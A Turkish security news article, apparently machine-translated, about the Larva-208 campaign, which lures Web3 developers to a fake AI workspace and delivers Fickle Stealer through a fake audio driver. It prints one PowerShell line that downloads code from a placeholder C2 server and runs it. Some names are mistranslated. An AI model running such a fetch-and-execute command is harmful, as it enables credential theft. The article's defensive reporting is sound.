Web3 geliştiricilerini hedefleyen sofistike bir kimlik avı kampanyası ortaya çıktı ve kimlik bilgisi çalma kötü amaçlı yazılımları sunmak için yapay zeka platformlarına artan ilgiden yararlandı.
Daha önce telefon tabanlı sosyal mühendislik aracılığıyla BT personelini hedeflediği bilinen tehdit oyuncusu Larva-208, titizlikle hazırlanmış sahte bir AI çalışma alanı platformu kullanarak blockchain geliştiricilerine odaklanmak için döndü.
Saldırı, Web3 geliştiricilerine gönderilen meşru iş teklifleri veya portföy inceleme talepleri ile başlar ve bunları hileli AI şirket uygulamalarına yönlendirir.
Bu iletişim, kurbanları benzersiz davet kodları ve e -posta adresleri kullanarak kötü amaçlı platformlara erişmeye teşvik etmek için MITER ATT & CK Tekniği T1566.002’den (Spearphishing bağlantısı) yararlanır.
Mağdurlar sahte platformla etkileşime geçtikten sonra, ses sürücülerinin modası geçmiş veya eksik olduğunu iddia eden aldatıcı bir hata mesajıyla karşılaşırlar, bu da onları gerçek bir Realtek HD ses sürücüsü gibi görünen şeyleri indirmelerini ister.
.webp)
Katalizör analistleri, Larva-208’in, kötü niyetli alanları “Norlax.ai” aracılığıyla meşru TeamPilot AI çalışma alanı platformunun ikna edici bir kopyasını stratejik olarak yarattığını belirledi.
Bu etki alanı yazım hatası tekniği (T1583.001 – alan adları), meşru AI işbirliği araçlarına aşina olabilecek şüphesiz geliştiricileri aldatmak için neredeyse aynı bir arayüz oluşturur.
İndirilen “Driver” aslında Larva-208’in komutu ve kontrol altyapısından kararsız stealer’ı almak ve dağıtmak için gömülü PowerShell komutlarını (T1059.001-Powershell) yürüten sofistike kötü amaçlı yazılımdır.
PowerShell infazı şu şekilde temsil edilebilir:-
# Simplified representation of the malicious payload execution
Invoke-WebRequest -Uri "C2_SERVER_URL" | Invoke-ExpressionGelişmiş Veri Sunum Özellikleri
Fickle Stealer kapsamlı bilgi toplama özellikleri, cihaz tanımlama verilerini sistematik olarak hasat eder, donanım özellikleri, işletim sistemi detayları ve IP adresleri ve coğrafi konumlar dahil olmak üzere coğrafi konum bilgileri gösterir.
Kötü amaçlı yazılım katalogları yazılımı yükledi, aktif işlemleri izliyor ve toplanan tüm zekayı Larva-208’in komut ve kontrol sunucularına (T1583.004-sunucu) iletir.
Güvenlik araştırmacıları, bu kampanyayı doğrudan daha geniş aydınlık Mantis Tehdit Grubuna bağladılar ve bu da geleneksel BT’nin kazançlı Web3 geliştirici ekosistemine hedeflemenin ötesine geçme konusunda koordineli bir çaba gösterdi.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.